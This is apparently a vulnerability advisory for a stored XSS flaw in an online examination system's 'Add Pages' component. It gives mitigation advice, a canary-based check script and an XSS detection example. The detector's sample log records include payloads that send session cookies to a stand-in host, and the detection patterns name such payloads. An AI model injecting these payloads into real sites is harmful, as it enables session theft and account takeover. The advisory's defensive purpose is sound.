CVE-2026-1421

3.5 LOW

📋 TL;DR

This is a stored cross-site scripting (XSS) vulnerability in the 'Add Pages' component of code-projects Online Examination System 1.0. An attacker with access to that component can save script inside a page's fields; because the stored content is not HTML-encoded when displayed, the script runs in the browser of every user who later views the page and can, for example, read that user's session cookie or redirect them to an attacker-controlled site. Every deployment of code-projects Online Examination System 1.0 is affected.

💻 Affected Systems

Products:
  • code-projects Online Examination System
Versions: 1.0
Operating Systems: Any
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the 'Add Pages' component, where user input is stored without validation and later displayed without HTML output encoding.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

A user with administrative rights views the malicious page; the script runs with that session and can perform any action the administrator can, such as changing exam results, creating accounts, or adding further malicious pages that keep the attacker's access alive.

🟠 Likely Case

Attackers steal users' session cookies to impersonate them, exposing exam content and student information.

🟢 If Mitigated

With server-side input validation and HTML output encoding, injected markup is displayed as text and never executes.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No (an account with access to 'Add Pages' is required, and a victim must view the stored page)
Complexity: LOW

Exploit details are publicly available on GitHub; crafting a working XSS payload requires no special tooling.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch is available. Fix the 'Add Pages' component code yourself: validate submitted fields on the server, and HTML-encode every stored field wherever it is rendered into a page. Encode on output rather than relying on stripping tags on input, which is easy to bypass.

🔧 Temporary Workarounds

Implement Input Validation

Applies to: all

Add server-side validation to sanitize all user inputs in the 'Add Pages' component, and HTML-encode stored values at output time; filtering on input alone is bypassable.

Enable Content Security Policy

Applies to: all

Add CSP headers so the browser refuses to run inline script and script from other origins (Apache example; requires mod_headers):

Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Header set X-Content-Type-Options "nosniff"

Caveat: without 'unsafe-inline', this policy also blocks any inline scripts and inline event handlers the application itself uses, so test it against the application before rolling it out. CSP limits what an injected script can do; it does not remove the vulnerability. X-Content-Type-Options is a general hardening header and does not by itself stop this XSS.

🧯 If You Can't Patch

  • Disable the 'Add Pages' functionality if not essential
  • Implement a web application firewall (WAF) with XSS protection rules

🔍 How to Verify

Check if Vulnerable:

Using an account that has access to 'Add Pages', submit a harmless probe such as <script>alert('XSS')</script> (or a unique canary string inside a script tag) in each text field, then load the page that displays it. Inspect the HTML response: if the tag appears unencoded (as <script>, not &lt;script&gt;) the script will run and the system is vulnerable. Test only on an instance you own or are authorized to test.

Check Version:

Check the system's documentation or configuration files for version information.

Verify Fix Applied:

After implementing fixes, submit the same payload again and confirm that the rendered page contains it only as encoded text (&lt;script&gt;...) and that nothing executes. Repeat for every field of the 'Add Pages' form, not just the one originally reported.
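The check described above and the output-encoding fix, as an added illustration that is not the project's own code: page storage and rendering are simulated in memory with a constructed store, and the probe uses a random canary instead of alert() so a positive result is harmless on a shared instance. The application itself is PHP, where the equivalent of html.escape() is htmlspecialchars() with ENT_QUOTES; the function names and the page layout below are assumptions made for the example.

```python
import html
import re
import secrets

# Constructed in-memory store standing in for the application's pages table.
PAGES: dict[int, dict[str, str]] = {}


def add_page(title: str, body: str) -> int:
    """Store a page exactly as submitted. Storing raw input is acceptable only if
    every place that displays it encodes for the output context."""
    page_id = len(PAGES) + 1
    PAGES[page_id] = {"title": title, "body": body}
    return page_id


def render_page_vulnerable(page_id: int) -> str:
    """Stored fields dropped straight into HTML: the stored-XSS pattern."""
    page = PAGES[page_id]
    return f'<h1>{page["title"]}</h1>\n<div class="page-body">{page["body"]}</div>'


def render_page_fixed(page_id: int) -> str:
    """Same template; every stored field is HTML-entity-encoded at output time.
    quote=True also encodes quotes, so the helper is safe inside attribute values."""
    page = PAGES[page_id]
    title = html.escape(page["title"], quote=True)
    body = html.escape(page["body"], quote=True)
    return f'<h1>{title}</h1>\n<div class="page-body">{body}</div>'


def make_probe() -> tuple[str, str]:
    """Canary-based probe: a unique token so a hit cannot be a pre-existing string,
    and no alert() so a positive result does not disturb other users."""
    canary = secrets.token_hex(8)
    return canary, f"<script>window.xss_{canary}=1</script>"


# A live <script> element whose body carries the canary. An encoded copy
# (&lt;script&gt;...) never matches and is inert in a browser.
_LIVE_SCRIPT = re.compile(r"<script[^>]*>[^<]*xss_([0-9a-f]{16})", re.IGNORECASE)


def payload_executes(page_html: str, canary: str) -> bool:
    """True when the probe survived as a real <script> element in the response."""
    return any(found == canary for found in _LIVE_SCRIPT.findall(page_html))


def check(render) -> bool:
    """Submit a probe through the add-page path into both fields and inspect the
    rendered output. Returns True if the renderer is vulnerable."""
    canary, probe = make_probe()
    page_id = add_page("Exam rules " + probe, probe)
    return payload_executes(render(page_id), canary)


if __name__ == "__main__":
    print("vulnerable renderer:", check(render_page_vulnerable))
    print("fixed renderer:     ", check(render_page_fixed))
```

Against a real instance, replace add_page() and render() with an authenticated POST to the add-page form and a GET of the page that displays it, and keep the canary check on the raw response body rather than relying on a browser pop-up.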

📡 Detection & Monitoring

Log Indicators:

  • POST requests to the add-pages endpoint whose parameters contain script tags, javascript: URLs or HTML event handlers (onerror=, onload=), including URL-encoded and mixed-case variants
  • Multiple submissions with suspicious payloads from one account or source address

Network Indicators:

  • HTTP POST bodies to the add-pages endpoint containing <script> tags, javascript: URLs or event-handler attributes

SIEM Query:

source="web_logs" AND (http_method="POST" AND uri_path="*add*page*" AND (http_content="*<script*" OR http_content="*%3Cscript*" OR http_content="*javascript:*" OR http_content="*onerror=*" OR http_content="*onload=*"))

Standard web-server access logs do not record POST bodies, so this query needs request-body logging from a WAF, reverse proxy or the application itself. Match case-insensitively and URL-decode the body where your SIEM supports it; literal patterns miss trivially obfuscated payloads.
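The detection logic above run over sample records, as an added example that is not part of the original advisory: it applies the literal SIEM pattern and a normalising detector (bounded URL-decoding, lower-casing, a small signature set) to constructed log records in the field layout the query assumes. The records, endpoint path and signature list are assumptions for the example, not data from any deployment.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample records in the field layout the SIEM query assumes
# (http_method, uri_path, http_content); not logs from any real deployment.
SAMPLE_LOGS = [
    {"id": 1, "http_method": "POST", "uri_path": "/admin/add_page.php",
     "http_content": "title=Rules&content=Welcome+students"},
    {"id": 2, "http_method": "POST", "uri_path": "/admin/add_page.php",
     "http_content": "title=x&content=<script>alert(1)</script>"},
    {"id": 3, "http_method": "POST", "uri_path": "/admin/add_page.php",
     "http_content": "title=x&content=%3CScRiPt%3Edocument.location%3D%27http%3A%2F%2F198.51.100.7%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E"},
    {"id": 4, "http_method": "POST", "uri_path": "/admin/add_page.php",
     "http_content": "title=x&content=<img src=x onerror=fetch('//198.51.100.7/?'+document.cookie)>"},
    {"id": 5, "http_method": "POST", "uri_path": "/admin/add_page.php",
     "http_content": "title=x&content=%253Cscript%253Ealert(1)%253C%252Fscript%253E"},
    {"id": 6, "http_method": "POST", "uri_path": "/admin/add_page.php",
     "http_content": 'title=Links&content=<a href="JavaScript:alert(1)">help</a>'},
    {"id": 7, "http_method": "POST", "uri_path": "/admin/add_page.php",
     "http_content": "title=Format&content=Use+%3Cb%3Ebold%3C%2Fb%3E+for+emphasis"},
    {"id": 8, "http_method": "GET", "uri_path": "/pages.php",
     "http_content": "<script>alert(1)</script>"},
]

# Assumed endpoint shape; equivalent to the query's uri_path="*add*page*".
PAGE_ENDPOINT = re.compile(r"add.*page", re.IGNORECASE)

# Signatures applied to the normalised (decoded, lower-cased) body.
# A starting set for illustration, not an exhaustive XSS grammar.
XSS_SIGNATURES = [
    ("script_tag", re.compile(r"<\s*script\b")),
    ("javascript_uri", re.compile(r"javascript\s*:")),
    ("event_handler", re.compile(
        r"\bon(error|load|click|mouseover|focus|pageshow|animationstart|toggle)\s*=")),
    ("active_embed", re.compile(r"<\s*(iframe|svg|object|embed)\b")),
]


def normalize(body: str) -> str:
    """URL-decode until stable (bounded, so double encoding is handled) and
    lower-case, so case tricks and %3C-style encoding do not evade the signatures."""
    current = body
    for _ in range(3):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()


def naive_match(rec: dict) -> bool:
    """The literal pattern of the original SIEM query: catches only the textbook payload."""
    body = rec["http_content"]
    path = rec["uri_path"]
    return (rec["http_method"] == "POST" and "add" in path and "page" in path
            and ("<script>" in body or "javascript:" in body))


def detect(rec: dict) -> list[str]:
    """Names of the signatures that fire for one record; [] if none or out of scope."""
    if rec["http_method"] != "POST" or not PAGE_ENDPOINT.search(rec["uri_path"]):
        return []
    body = normalize(rec["http_content"])
    return [name for name, pattern in XSS_SIGNATURES if pattern.search(body)]


def scan(records: list[dict]) -> dict[int, list[str]]:
    """Map record id -> signatures hit, for records that hit anything."""
    return {rec["id"]: hits for rec in records if (hits := detect(rec))}


if __name__ == "__main__":
    print("literal query flags:", [r["id"] for r in SAMPLE_LOGS if naive_match(r)])
    print("normalising detector flags:", scan(SAMPLE_LOGS))
```

The literal query flags only record 2; the normalising detector also catches the mixed-case URL-encoded payload (3), the event-handler payload (4), the double-encoded payload (5) and the javascript: link (6), while leaving the benign formatting post (7) and the GET (8) alone. Tune the signature list to the markup your administrators legitimately use in pages.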
